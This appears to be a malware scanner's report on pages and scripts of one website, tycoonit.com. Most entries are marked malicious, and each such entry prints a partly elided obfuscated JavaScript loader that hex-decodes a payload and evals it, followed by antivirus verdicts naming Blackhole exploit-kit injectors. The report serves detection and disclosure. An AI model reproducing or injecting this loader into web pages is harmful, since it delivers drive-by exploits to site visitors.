Request | Server response | Status |
http://tycoonit.com/ | 200 OK Content-Length: 13004 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is an obfuscated loader: it splits a string of hex values on "(", subtracts 22 from each value, rebuilds the text with String.fromCharCode and passes the result to eval. The decoder function and the separator are assigned only inside catch handlers, so decoding apparently depends on the preceding statements throwing.
lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}
Antivirus reports:
- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/museutils.js?3992981318 | 200 OK Content-Length: 27355 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is an obfuscated loader: it splits a string of hex values on "(", subtracts 88 from each value, rebuilds the text with String.fromCharCode and passes the result to eval. The decoder function and the separator are assigned only inside catch handlers, so decoding apparently depends on the preceding statements throwing.
wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/jquery.musemenu.js?3788803530 | 200 OK Content-Length: 10140 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/webpro.js?197321703 | 200 OK Content-Length: 41388 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/musewpdisclosure.js?4285748861 | 200 OK Content-Length: 7878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/jquery.watch.js?4068933136 | 200 OK Content-Length: 5706 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/index.html | 200 OK Content-Length: 13004 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/website-templates.html | 200 OK Content-Length: 6708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/test404page.js | 404 Not Found Content-Length: 393 Content-Type: text/html | clean |
http://tycoonit.com/anti-virus.html | 200 OK Content-Length: 6698 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/search-engine-submission.html | 200 OK Content-Length: 6722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/contact-us.html | 200 OK Content-Length: 9877 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|